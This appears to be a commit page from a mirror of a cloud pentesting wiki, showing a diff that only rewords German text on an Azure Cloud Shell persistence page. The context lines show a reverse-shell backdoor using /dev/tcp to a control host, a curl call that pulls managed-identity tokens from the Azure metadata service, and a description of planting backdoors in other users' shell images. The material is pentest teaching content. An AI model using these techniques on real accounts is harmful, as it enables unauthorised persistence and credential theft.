mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-09 06:10:48 -08:00
Translated ['src/pentesting-cloud/azure-security/az-persistence/az-cloud
This commit is contained in:
@@ -15,7 +15,7 @@ echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CC
|
||||
```
|
||||
Diese Hintertür kann Befehle sogar 5 Minuten nach dem Abschluss der Cloud-Shell durch den Benutzer ausführen.
|
||||
|
||||
Zusätzlich die Metadaten-Dienste von Azure nach Instanzdetails und Tokens abfragen:
|
||||
Zusätzlich wird der Azure-Metadatenservice nach Instanzdetails und Tokens abgefragt:
|
||||
```bash
|
||||
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
|
||||
```
|
||||
@@ -23,7 +23,7 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a
|
||||
|
||||
Wenn ein Angreifer Bilder anderer Benutzer in einem Storage Account findet, auf den er Schreib- und Lesezugriff hat, kann er das Bild herunterladen, **eine Bash- und PS-Hintertür hinzufügen** und es zurück in den Storage Account hochladen, sodass beim nächsten Zugriff des Benutzers auf die Shell die **Befehle automatisch ausgeführt werden**.
|
||||
|
||||
- **Bild herunterladen, Hintertür hinzufügen und hochladen:**
|
||||
- **Download, Hintertür und Hochladen des Bildes:**
|
||||
```bash
|
||||
# Download image
|
||||
mkdir /tmp/phishing_img
|
||||
|
||||
Reference in New Issue
Block a user